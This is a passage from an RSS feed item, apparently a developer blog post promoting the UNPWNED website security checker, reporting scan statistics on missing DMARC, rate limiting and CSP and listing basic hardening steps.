&lt;p&gt;&lt;strong&gt;Almost half of all sites can be email-spoofed.&lt;/strong&gt; 47% were missing DMARC records, which means anyone can send emails pretending to be from their domain. Your users could get a phishing email "from" you today.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;70% had no API rate limiting.&lt;/strong&gt; That means a single script could hammer their endpoints with zero resistance. No throttling, no blocking, nothing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;69% had no Content Security Policy.&lt;/strong&gt; CSP is one line of configuration that prevents XSS attacks. Most developers skip it because they don't know about it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Good News
&lt;/h2&gt;

&lt;p&gt;Sites that used our fix suggestions and rescanned &lt;strong&gt;improved by an average of +8 points&lt;/strong&gt;. Some jumped from D to A in a single afternoon.&lt;/p&gt;

&lt;p&gt;The gap between "vulnerable" and "secure" is usually not a rewrite. It's a few headers, a DNS record, and some basic configuration.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Can Do Right Now
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Add a CSP header&lt;/strong&gt; - even a basic one blocks most XSS vectors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Set up DMARC, SPF, and DKIM&lt;/strong&gt; - protect your users from email spoofing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Add rate limiting&lt;/strong&gt; - even a simple middleware prevents abuse&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enable HSTS&lt;/strong&gt; - one header that forces HTTPS everywhere&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Check your CORS policy&lt;/strong&gt; - don't use &lt;code&gt;*&lt;/code&gt; in production&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;We built a free instant security checker - no signup required:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.unpwned.io/check" rel="noopener noreferrer"&gt;Check your website security score&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It runs 30+ checks and gives you a score, grade, and list of findings. If you want detailed fix instructions, you can sign up for free (5 scans/month).&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Built solo by an indie hacker. UNPWNED was featured by top dev communities and presented to engineering teams at leading tech companies. If you have questions about any of these findings, drop a comment - happy to help.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>webdev</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
